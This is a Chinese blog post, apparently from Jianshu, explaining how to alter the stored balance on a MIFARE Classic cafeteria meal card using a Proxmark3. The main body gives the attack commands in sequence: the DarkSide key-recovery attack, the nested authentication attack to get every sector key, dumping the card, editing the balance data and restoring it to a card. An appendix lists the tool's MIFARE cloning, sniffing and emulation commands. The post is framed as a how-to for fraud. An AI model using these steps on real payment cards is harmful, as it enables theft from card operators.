proxmark3之改飯卡金額

對于無線射頻卡RFID小弟有所研究今日分享一篇關于修改飯卡金額的文章

如果對ID,IC卡還不是很了解先看看raidwar的文章把,驅動什么的請自行百度

低俗文章之傻傻分不清楚的ic和id卡

以及命令幫助

使用Proxmark3進行MIFARE Classic卡的安全測試

以及數據分析

RFID之M1卡數據分析

下面進入正題

首先

驅動裝好之后可以看到設備管理器中查看 發現proxmark3使用是COM5端口

proxmark3.exe COM5

hw tune

成功后如下顯示

此時講自己的高頻卡放上去然后直接使用命令

hf mf mifare

如果


找到 validkey 則直接使用命令:?

必須知道一個正確的Key方可進行相關的操作

hf mf nested 1 0 A ffffffffffff

基于驗證漏洞進行全卡區域Key破解?

如果結果為

則 ? 再次進行漏洞循環破解

hf mf mifare 524bb6a2?

直到找到正確密碼為止(顯示Found valid key)

找到密碼后使用(測試嵌套認證漏洞,基于一個已知Key,獲取都有扇區Keys)

hf mf nested 1 0 A ffffffffffff d

導出密碼二進制文件,接著使用

hf mf dump

dump數據到bin文件 后分析修改數據后再次導入

使用命令以二進制方式恢復數據到空白的MIFARE classic卡

hf mf restore

完成


附錄

hf mf (MIFARE卡的相關命令...)

help顯示幫助

dbg設置默認調試模式

rdbl讀取MIFARE classic卡的區塊數據

rdsc讀取MIFARE classic卡的扇區數據

dump導出MIFARE classic卡的數據到二進制文件

restore從二進制文件恢復數據到空白的MIFARE classic卡

wrbl改寫MIFARE classic卡的區塊數據

chk測試MIFARE classic卡的各個區塊KEY A/B

mifare基于PRNG漏洞,執行mifare “DarkSide”攻擊操作

nested測試嵌套認證漏洞,基于一個已知Key,獲取都有扇區Keys

sniff嗅卡片與讀寫器之間的通訊(等同于hf 14a snoop)

sim模擬一個MIFARE卡片

eclr清除仿真內存的各區塊數據

eget獲取仿真內存的各區塊數據

eset設置仿真內存的各區塊數據

eload從導出的文件加載仿真數據

esave導出保存仿真數據到文件

ecfill利用仿真器的keys來填補仿真內存

ekeyprn打印輸出仿真內存中的keys

csetuid直接設置可改UID卡的UID

csetblk把對應區塊數據寫入UID卡

cgetblk讀取UID卡對應區塊數據

cgetsc讀取UID卡對應扇區數據

cload寫入dump數據到UID卡。注意

csave保存UID卡數據到文件或者仿真內存

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容

  • 1、第八章 Samba服務器2、第八章 NFS服務器3、第十章 Linux下DNS服務器配站點,域名解析概念命令:...
    哈熝少主閱讀 3,775評論 0 10
  • linux資料總章2.1 1.0寫的不好抱歉 但是2.0已經改了很多 但是錯誤還是無法避免 以后資料會慢慢更新 大...
    數據革命閱讀 12,239評論 2 33
  • 2017年8月29日 星期二 多云 早晨起床六點多一點點,小薛薛從樓上下來了,眼睛有點浮腫(流過眼淚睡覺...
    廈小薛智一爸爸閱讀 127評論 0 2
  • 媽媽有的時候太壞了,我昨天晚上我沒好好說日記,媽媽拍了我手上一巴掌都差點拍紅了。不僅拍我一巴掌還說我了,批...
    45cbff51831c閱讀 466評論 0 1
  • 環境配置 Python 2.7+ VideoCapture-0.9-5 PIL(Python Imaging Li...
    科斯莫耗子閱讀 3,624評論 0 1